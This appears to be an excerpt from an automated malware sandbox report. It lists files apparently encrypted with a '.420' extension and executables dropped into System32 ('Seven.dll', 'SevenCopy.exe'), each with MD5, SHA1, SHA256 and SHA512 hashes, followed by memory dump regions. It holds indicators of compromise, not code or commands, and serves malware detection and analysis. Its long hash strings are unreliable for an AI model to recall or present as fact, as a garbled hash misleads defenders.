SHA1914e1c5300cf5b2d4fbb24601424bd83fa0c331d
SHA256d0422f3e20594279b13c8ff60ba6c51e9339dbe59def0fe771cea8662cc5e620
SHA51270087468996a74a6dc8ab0b4a25d527c19c9bfacdc310bd6e857ffdc7174202657f9cc7f78fb9d50557f7144fe8838b9402265ce7a13e5003d93e9754c4a5179
-
C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI22FD.txt.420Filesize
415KB
MD579ddc170d9b3130779b528f25a62651e
SHA1fc1be342abacc0d461539c9abfd5235ae6540e6c
SHA256d105087c31fd2e52823ec00b213a88d0750c414ef37d81ad06819f7e8bfa2511
SHA512051c1179593819ae716d902f7ea8a5d4ba20b164108c950d0184b7feb0b1fd767966c2f65f5e540387918048f9637154b95b61cfec55537f9cd8b4565f3c4703
-
C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI22D9.txt.420Filesize
11KB
MD5ee7c02bb6840a3558a826b9b21eb760d
SHA11b475d87d263a011faf6662f616dc9ed93e5433c
SHA256ad47c7a2ca76800c7b6bed4a68a50f16b13d1733d47af059d1b289cfab00c6ef
SHA512dfbf7c25328e21b25ef56e9465f3d7153226af5252f0ae4e6c14acd4b54d331fbe75b4697d5c03395658b6a4e11ffd3c7e48ed80473bec04cfa79a31e1aace42
-
C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI22FD.txt.420Filesize
11KB
MD503a9940f6a5dc3f43e6c80550c2d3c5c
SHA108928aafd2b63f9cc5403c1c21c66801d1231e8d
SHA256ceeb3753fc0dca49a08a49c389c049ebb9fdce7868dda76baeca18ec9424419f
SHA5124352b72055c455817181bda635cadfd7a493fcae94a8c93d47b7a669734bed84c288f1b3401b8d9e3503d99e78efcc8f03302061444a4ffa9aeaf736d0d590e4
-
C:\Users\Admin\AppData\Local\Temp\jawshtml.html.420Filesize
16B
MD565e115805f15f9cda5eb01e8f742d121
SHA1e3ecf29bfa71ce07baf8d02009afb8766f35981b
SHA2567852451b2b252515f369b14bd765135c2e11fee72276b5020e3ed61513c5611a
SHA512dccbfdd893e5806fa1418e48e0c0c72ec2d1266ee7de48fce34bf3f74bda7e0682e8bf90de53594f34c3d5682c8164d9f6b6ea3977619be8487c2e339faa1ada
-
C:\Users\Admin\AppData\Local\Temp\mapping.csv.420Filesize
120KB
MD542c12f9e321e00ee8f2ec180e7863e24
SHA18d32c5df1057f7d040c919fbea6af11a274d2374
SHA25663f8f0d578669353be78d86d0173e8f49202fd56f88d36bbefcae31b55d9ac8a
SHA512c917ed0f9013642a6fe7968315d8454db9173b75e54184449682f75d8e5c02bdc77895e08e15eeb595de6811c09c5fbe0b85982e664223e28d351d2dd10225b2
-
C:\Users\Admin\AppData\Roaming\BackupFormat.html.420Filesize
297KB
MD59aaca8a51090c431f8bdfb8b4964782e
SHA1d879cdcfc902cf89a891a5d7a5a69770babffcaf
SHA2561c5d320e75b15969ce400ff11a1a52c71562893b75a08cca7f1d5457ead7a6b0
SHA5127689b78c29a2ad74b509e4c49338eff4765792a235419a01d5b700a008ccf51e06884fc293a5ca447f45eb73fbc4f51a27fb75aae1709a7ab8b07bb6ebd6cfa1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg.420Filesize
51KB
MD54927e0cb561d4450afc0b847853f42f2
SHA14a3645773d95ed07b59272871f2e88c399adf0dc
SHA2568ed353d134b8d10b78f61ed8bfc614aacaff504a1d0659be1d245ca97c759384
SHA5125ec501ba8e731ab4ca7df72887850bd560e65151d03a32be9839948df2f12d38ab921bf3a30fd73e41262925aa1b43ad1b8b9b3eb6e500f82c1985cfb34145c0
-
C:\Users\Admin\AppData\Roaming\ResumeSkip.csv.420Filesize
439KB
MD5a66d20f703fba429cda1ee1efc9144bc
SHA10c4a631cc5be4567d8d07e4f32870acaed4f57fe
SHA2561f3307657280fa4aecf77c6d21762634dc7063eab84756fd9b8f58b44377d412
SHA5125df136267b2233656fdbe767b7b63c807e324ea177ec8e119281cb391a4769aaa28b7bc35a6ae5f6281f8084615d2f3f8cbd33066fb4830dea5b154204150035
-
C:\Users\Admin\Links\Desktop.lnk.420Filesize
512B
MD56b45186a061bab0817e704bfc96e7f12
SHA1e6023ecdf03094b2749d607f403e8e4dbbad7456
SHA256c41980c4695a7c2a35bfe658dd6bc673142e67862fd9056573674f1d5ba046ef
SHA512c8547da94385ce232036ba73850cb645618190ee0f955f6626794b0428fbd2fcda206513be5386460118da63fe209f6c93a539ad342ec61da859da1ba8fbc97f
-
C:\Users\Admin\Links\Downloads.lnk.420Filesize
944B
MD5762fcaf3b80da6e45e9fd2a1f5b3ad75
SHA18ed015af89083353407419fc6d300647b694ec75
SHA256e90ff53be8ce474cd496fe021f1253b6aac0362a2a39947af402d73db4664eb2
SHA512c5731992886d8adaccd8f4ba81c722343dae3809635a629fac3d46cc96a331177329b594158c175debeca5ee3deaf3437d408c4da83a144a90f82881a5cd9c47
-
C:\Windows\System32\Seven.dllFilesize
1.0MB
MD50e419066fdd5c5ff4199332287e265d3
SHA1c3052502883d0d6e41775e3c4481c5421393120d
SHA256a3d03cdade0391294f9ec56dfa5eaf96f39d31a1e7fcb8e89b3582206ce8dbd9
SHA51236dfedd49571620b9b1b0a4688b53008e593f85547d9ef07d12cdc8a478879d2b4fbb6a604d94e0d0d04eb60c7f42688e51b0d75006e315655abf098e23bef2f
-
C:\Windows\System32\Seven.runtimeconfig.jsonFilesize
340B
MD5253333997e82f7d44ea8072dfae6db39
SHA103b9744e89327431a619505a7c72fd497783d884
SHA25628329cf08f6505e73806b17558b187c02f0c1c516fe47ebfb7a013d082aaa306
SHA51256d99039e0fb6305588e9f87361e7e0d5051507bf321ba36619c4d29741f35c27c62f025a52523c9e1c7287aabf1533444330a8cdf840fa5af0fa2241fcb4fc2
-
C:\Windows\System32\SevenCopy.exeFilesize
139KB
MD56503f847c3281ff85b304fc674b62580
SHA1947536e0741c085f37557b7328b067ef97cb1a61
SHA256afd7657f941024ef69ca34d1e61e640c5523b19b0fad4dcb1c9f1b01a6fa166f
SHA512abc3b32a1cd7d0a60dd7354a9fcdff0bc37ec8a20bb2a8258353716d820f62d343c6ba9385ba893be0cca981bbb9ab4e189ccfeee6dd77cc0dc723e975532174
-
memory/3616-11-0x0000026C333B0000-0x0000026C333C0000-memory.dmpFilesize
64KB
-
memory/3616-12-0x0000026C333B0000-0x0000026C333C0000-memory.dmpFilesize
64KB
-
memory/3616-15-0x00007FFAE4D60000-0x00007FFAE5821000-memory.dmpFilesize
10.8MB
-
memory/3616-1-0x0000026C332F0000-0x0000026C33312000-memory.dmpFilesize
136KB
-
memory/3616-10-0x00007FFAE4D60000-0x00007FFAE5821000-memory.dmpFilesize
10.8MB
-
memory/17684-478-0x00007FF634280000-0x00007FF6342E7000-memory.dmpFilesize
412KB
-
memory/17908-487-0x000001F5B6500000-0x000001F5B6520000-memory.dmpFilesize
128KB
-
memory/17908-871-0x000001F5C7700000-0x000001F5C7720000-memory.dmpFilesize
128KB
-
memory/17908-1152-0x000001F5C9B70000-0x000001F5C9C70000-memory.dmpFilesize
1024KB
-
memory/17908-480-0x000001F5B5400000-0x000001F5B5500000-memory.dmpFilesize
1024KB
-
memory/17908-507-0x000001F5B6850000-0x000001F5B6870000-memory.dmpFilesize
128KB
-
memory/17908-496-0x000001F5B61C0000-0x000001F5B61E0000-memory.dmpFilesize
128KB
-
memory/18044-477-0x00007FF634280000-0x00007FF6342E7000-memory.dmpFilesize
412KB
-
memory/18368-476-0x00007FF634280000-0x00007FF6342E7000-memory.dmpFilesize
412KB
